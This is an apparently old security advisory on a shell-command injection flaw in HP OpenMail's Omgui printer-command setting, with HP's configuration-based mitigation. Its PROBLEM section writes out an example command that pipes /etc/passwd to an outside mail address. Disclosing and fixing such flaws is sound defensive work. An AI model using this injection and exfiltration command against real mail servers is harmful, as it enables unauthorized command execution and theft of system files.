COMMAND

    OpenMail

SYSTEMS AFFECTED

    Any HP 9000 series 700/800 systems running OpenMail

PROBLEM

    David Jones found following.   HP's OpenMail system consists of  a
    server package that installs on an HP9000 workstation, as well  as
    a  client  (Omgui).   Other  mail  systems  may  also  be  able to
    interface to it.

    In Omgui, if you  select "Options->Printer..." from the  menu, you
    will be prompted for a printer command.  The default is  something
    like "lp  -dlaser4si".   This command  is simply  executed on  the
    server, presumably using the system()  call.  This means that  any
    mail user  can run  arbitrary shell  commands on  the mail server.
    For example, if you change my printer to:

        cat /etc/passwd | /usr/lib/sendmail your@address

    and print a message, then I will get a copy of the password file.

    The good news is that mail  users have their own Unix UIDs  on the
    server.   ("id  |  /usr/lib/sendmail  your@address"  returns   the
    relevant info).  As long as OpenMail stores users' mail folders as
    user-owned files with  appropriate permissions, then  there should
    be  no  way  to  read  other  users'  mail.   The  real problem is
    situations  where  the  sysadmin  has  denied  users regular login
    access to the mail server, possibly by putting "*" in the password
    field.  This is standard practice as a security measure.

SOLUTION

    This  is  a  generic  issue  with  any  program that permits shell
    escapes.   If  you  have  done  "*"  password  protection  on your
    OpenMail server, then you may want to check your security measures
    carefully - your users can get the equivalent of shell whether you
    allow it or not.  However, it is generally-accepted good  practice
    to set up UNIX  users with an appropriately-configured  restricted
    shell.  Relying on a '*' in the password field is not  sufficient;
    that only means "deny logon", not "deny arbitrary shell  command."
    For even tighter  security, the shell  can be reset  to /bin/true,
    but that would not of course allow a user to call lp.

    Hewlett-Packard notes that this issue has already been  adequately
    addressed  in  OpenMail.   There  is  a  general parameter setting
    (UAL_PRINT_SERVER_ONLY) in the general.cfg  file, that, if set  to
    TRUE, forces all  server printing to  go through OpenMail's  print
    server.  The  general customization file general.cfg is located in
    /var/opt/openmail/sys, as is the print server's configuration file
    print.cfg.  On the client all that is necessary is to then  change
    the 'Printer  Server Command'  to point  to one  of the configured
    printers.  OpenMail's  print server uses  a configuration file  to
    configure  available  printers,  and  validates each print request
    against its configured  printers. Any print  requests that do  not
    match the required syntax will not be executed.  More  information
    about OpenMail's print server and how to configure it can be found
    in the OpenMail Technical Guide (pages 3-366 to 3-369 for the  GR5
    edition).